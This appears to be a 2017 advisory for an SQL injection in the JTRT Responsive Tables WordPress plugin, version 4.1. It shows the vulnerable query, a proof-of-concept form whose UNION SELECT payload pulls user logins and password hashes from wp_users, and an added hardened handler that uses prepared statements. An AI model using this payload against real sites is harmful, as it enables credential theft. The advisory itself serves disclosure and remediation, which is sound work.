syst3m_h4x0r

WordPress Plugin JTRT Responsive Tables 4.1 - SQL Injection

Nov 3rd, 2017
Description:

Type of user access: single user.

$_POST['tableId'] is not escaped before it is concatenated into the SQL query shown below.

http://lenonleite.com.br/en/blog/2017/09/11/jtrt-responsive-tables-wordpress-plugin-sql-injection/

File / Code:

Path: /wp-content/plugins/jtrt-responsive-tables/admin/class-jtrt-responsive-tables-admin.php

Line: 183

$getTableId = $_POST['tableId'];
...

$retrieve_data = $wpdb->get_results( "SELECT * FROM $jtrt_tables_name WHERE jttable_IDD = " . $getTableId );

Proof of Concept:

1 – Log in with single user.

2 – Using form, sqli by post:

<form method="post" action="http://target.dev/wp-admin/admin-ajax.php?action=get_old_table">
<input type="text" name="tableId" value="1 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass),4,5 FROM wp_users WHERE ID=1">
<input type="submit" name="">
</form>
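
A hardened form of the handler behind the query at line 183, as an added example: it is not the plugin's actual fix and not part of the original paste. The function name, the nonce action, the 'edit_posts' capability and the table-name suffix are assumptions; check_ajax_referer(), current_user_can(), wp_unslash(), wp_send_json_*() and $wpdb->prepare() are WordPress core APIs, and the code runs inside WordPress.

```php
<?php
// Added example, not the plugin's code. Runs inside WordPress (admin-ajax.php).
// Hypothetical names: jtrt_get_old_table_hardened, the 'jtrt_get_old_table'
// nonce action, the 'edit_posts' capability and the table-name suffix.

add_action( 'wp_ajax_get_old_table', 'jtrt_get_old_table_hardened' );

function jtrt_get_old_table_hardened() {
    global $wpdb;

    // Reject requests without a valid nonce (expected in the 'nonce' field).
    check_ajax_referer( 'jtrt_get_old_table', 'nonce' );

    // Require a capability instead of accepting any logged-in account.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Validate: tableId must be a plain positive integer and nothing else.
    $raw = isset( $_POST['tableId'] ) ? wp_unslash( $_POST['tableId'] ) : '';
    if ( ! is_string( $raw ) || ! ctype_digit( $raw ) || (int) $raw < 1 ) {
        wp_send_json_error( 'invalid tableId', 400 );
    }
    $table_id = (int) $raw;

    $jtrt_tables_name = $wpdb->prefix . 'jtrt_tables'; // assumed table name

    // Before (vulnerable, from the paste):
    //   $wpdb->get_results( "SELECT * FROM $jtrt_tables_name WHERE jttable_IDD = " . $getTableId );
    // After: the value is bound through a %d placeholder, so it can only
    // reach MySQL as an integer literal.
    $retrieve_data = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT * FROM {$jtrt_tables_name} WHERE jttable_IDD = %d",
            $table_id
        )
    );

    wp_send_json_success( $retrieve_data );
}
```

The %d placeholder alone closes the injection; the nonce and capability checks narrow who can reach the query at all, which matters because the paste notes that any single logged-in user can call this action.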